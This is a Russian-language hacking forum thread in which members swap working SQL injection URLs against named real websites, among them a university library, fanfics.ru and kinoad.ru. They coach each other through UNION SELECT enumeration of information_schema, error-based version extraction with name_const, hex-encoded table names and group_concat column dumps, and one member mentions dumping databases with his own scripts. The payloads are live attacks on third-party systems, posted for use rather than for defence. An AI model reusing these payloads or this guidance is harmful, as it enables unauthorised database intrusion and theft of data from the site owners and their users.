Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    http://www.jewish.donetsk.ua/stat.php?topic=news&page=74&id=1404-9999.9+union+select+1,2,3,4,table_name,6,7,8,9,10,11+from+information_schema.tables+limit+0,1--+d

    Конечно, limit 0,0 сделал.
     
    1 person likes this.
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    943
    Likes Received:
    827
    Reputations:
    605
    http://venec.ulstu.ru/lib/go.php?id=21511111111111+UNION+SELECT+1,2,3,4,5,6,7,8,9,unhex%28hex%28version%28%29%29%29,11,12,13,14,15,16,17,18,19,20,21,22--


    не?
     
    _________________________
    3 people like this.
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    172
    Reputations:
    75
    ну ты и мозг)))
    а тут

    http://www.fanfics.ru/read.php?id=3&chapter=-616'

    ошибка есть, что не подставлю она пропадает, как быть?
     
  4. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    943
    Likes Received:
    827
    Reputations:
    605

    какой там вывод? или я в шары долблюсь?
     
    _________________________
    2 people like this.
  5. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    норм. вывод '5.1.45'
     
    1 person likes this.
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    172
    Reputations:
    75
    чёт непойму где ты там вывод нашол? у меня как небыло так и нету
     
  7. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Пробелы постирайте))

     
    2 people like this.
  8. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,018
    Likes Received:
    417
    Reputations:
    231
    [​IMG]
     
    1 person likes this.
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Потому что скуля там не в GET-параметре, а в URI:

    http://www.fanfics.ru/read.php?id=3&'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1

    Посмотри внимательно на запрос, а вывод все-ровно есть, магия!!11

    А ты, судя по всему, юзаешь FF, который урлэнкодит запросы. Используй другой браузер, или ставь патч для FF (https://rdot.org/forum/showthread.php?t=1403)
     
    3 people like this.
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    172
    Reputations:
    75
    точняк, в опере норм открывает, единственная трабла, я сливаю базы через свои php скрипты, и они также как и фф нехотят выодить как нужно, мб есть какое решение?

    и сразу ещо вопрос, таблицы выводит нормально, колонки нехочет

    http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3,4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+limit+0,1--+

    как их вывести?
     
  11. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3,4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+limit+0,1--+

    Читая твои вопросы, в 70% у тебя проблема в себе самом и в том, что ты не пытаешься сам решить проблему. Если хочешь чему-то научиться, сначала пробуй разобраться.
     
    #19931 Melfis, 24 Mar 2012
    Last edited: 24 Mar 2012
    1 person likes this.
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Все выводиться, WHERE убери =\
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    883
    Reputations:
    859
    После 'where' надо добавить table_name=0x[хекс значение выводимой таблы]+limit+0,1+--+
     
    _________________________
  14. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    А на мой вопрос кто нибудь ответит?
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    для кого это тема?

    там море ссылок
     
    _________________________
  16. beBoss

    beBoss New Member

    Joined:
    29 Sep 2010
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    http://site.com/about.php?page='

    Is that sql vuln ?

    Well, for now I don't want to post link over the internet, but can you help me a little to find the tables ? I tried so many of ways but can't get working method...

    My tries:
    Code:
    http://site.com/about.php?page=')+order+by+13--+-
    http://site.com/about.php?page='+order+by+13--+-
    http://site.com/about.php?page=' order by 13
    But there is no change...
    Any ideas ?

    BTW I'm sorry about the language, but if I use google translate, would be awful for all of us...
     
    1 person likes this.
  17. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Yes, this is sql-injection, but in LIMIT. You can't exploit this vuln.
     
  18. beBoss

    beBoss New Member

    Joined:
    29 Sep 2010
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Sad face :(
    Thanks for the info :)
     
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    172
    Reputations:
    75
    та то я нечаёно оставил, забыл вытереть прежде чем запостить

    да и так пробовал, вабще колонки выводить нехочет
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    883
    Reputations:
    859
    Не понимаю почему у вас не получается, вот вам вывод, взял из случайной таблици: INNODB_CMP_RESET где ее хекс значение равняется 494e4e4f44425f434d505f5245534554

    _http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name=0x494e4e4f44425f434d505f5245534554+limit+0,1--+
     
    _________________________
Loading...
Thread Status:
Not open for further replies.